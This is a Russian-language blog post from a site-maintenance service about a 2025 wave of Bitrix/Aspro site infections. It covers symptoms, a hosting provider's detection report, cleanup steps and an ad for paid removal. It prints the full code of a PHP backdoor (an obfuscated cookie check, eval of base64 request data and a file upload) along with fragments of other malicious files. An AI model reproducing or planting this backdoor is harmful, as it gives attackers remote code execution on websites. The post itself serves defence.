Внимание! 03.02.2025 года началась третья большая волна взломов сайтов на Битриксе. Первые две большие волны были в 2023 и 2024 годах и были тоже весной. Я уже писал как я тогда чистил сайты от вирусов.
Сейчас анализирую ситуацию на сайтах клиентов, но взломы скорее всего происходят на не обновленных сайтах АСПРО. Предлагаем не ждать пока сайт упадёт в поисковом рейтинге и воспользоваться нашими услугами по удалению вирусов В рамках которой удалим вирусы с вашего сайта и закроем дыры через которые вирусы проникают на ваш сайт. Даём гарантию на свою работу от 3-ёх месяцев.
Как это выглядит:
- Сайт может открываться, но не работает каталог, блог, новости и различные разделы сайта.
- Не открывается админка сайта, пишет ошибку: Forbidden You don’t have permission to access /bitrix/ on this server:
Появляются файлы со странным содержимым и странными именами вида ( a67fb6123dd6.php , siteheads.php, CoMtTtIdz.php):
php echo 409723*20;if(md5($_COOKIE[‘d’])==»\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x3
6\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143″ ){echo»\x6f\x6b»;eval(base64_decode($_REQUEST[‘id’]));if($_POST[«\165\160″]==»\165\x70»){@copy($_FILES[«\x66\151\x6c\x65»][«\164\155\x70\x5f\x6e\x61\x6d\x65»],$_FILES[«\146\x69\154\x65»][«\156\141\155\x65»]);}}
Вот что чаще всего по этому поводу пишет Тех.Поддержка хостинга:
Примененный к сайту ограничивающий шаблон блокирует запуск части известных вредоносных скриптов и шеллов, а также препятствует повторному заражению сайта. Наша система среагировала на вирусные сигнатуры:
./ajax/63825ab481b4.php
«{echo\»ok\»;=>|eval(base64_decode($_REQUEST[\»id\»]));if($_POST[\»up\»]==\»up\»){copy($_FILES[\»file\»]»
./ajax/gxrgom.php +477
«$host){if(=>|function_exists(\»getmxrr\»)){getmxrr($host,$mxhosts,$mxweight);return $mxhosts[0]»
./ajax/cdd5e3a4ec.php +27
«c=strrev(‘=>|etalfnizg’); return $preparefunc($filter); } /** * Sets up the default f»
./ajax/xl2024.php +4″ eval($o(\»=>|CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZx»./bitrix/-/s1/bitrix/catalog.element/59d/12/124e62585ca1e1700eb8678cefc43da0.php +409″‘:\\’YTo1ND=>|p7czoxMDoiVVNFX1JFR0lPTiI7czoxOiJOIjtzOjY6IlNUT1JFUyI7YTowOnt9czoyMToiU0hPV19VTk»
./bitrix/-/s1/bitrix/catalog.element/59d/1d/1d5f8d8e7a09d9c41b66f8d07afd16bb.php +442
Вам необходимо проверить файлы сайтов на наличие стороннего кода, не характерного для Вашей CMS, а также наличие посторонних файлов среди файлов сайта. Для проверки Вы можете использовать утилиту AI-Bolit. С её помощью Вы можете провести проверку в параноидальный режиме и получить отчет, с указанием файлов, на которые необходимо обратить внимание. Полученную информацию вы можете передать профильным специалистам для дальнейшего анализа.
Вирус создает огромное количество своих файлов в папках сайта. И что самое важное, он создает и подменяет файлы .htaccess сайта. Именно они первично не дают работать разделам сайта и админке нормально.
Что делать
- Восстановить доступ к админке удалив из папок /bitrix/ и /bitrix/admin/ файлы .htaccess.
- В админке перейти в инструмент Прокативная защита — Поиск троянов — Проверка .htacess
- Удалить все файлы .htacess и восстановить основные (потом привести основной htaccess к нужному вам виду)
- Там же произвести сканирование на поиск вирусов через сканирование файлов.
- Проканализировать выдачу и удалить файлы с вирусом. Почистить файл index.php, обычно в его начало вставляется вредоносный код тоже.
- Закрыть уязвимости обновив Битрикс и АСПРО до последних версий. Или закрыть уязвимости АСПРО вручную, но Битрикс обновить нужно.
- Перезапустите сервер чтобы убить вредоносные процессы.
Предлагаем воспользоваться нашими услугами по удалению вирусов В рамках которой удалим вирусы с вашего сайта и закроем дыры через которые вирусы проникают на ваш сайт. Даём гарантию на свою работу от 3-ёх месяцев.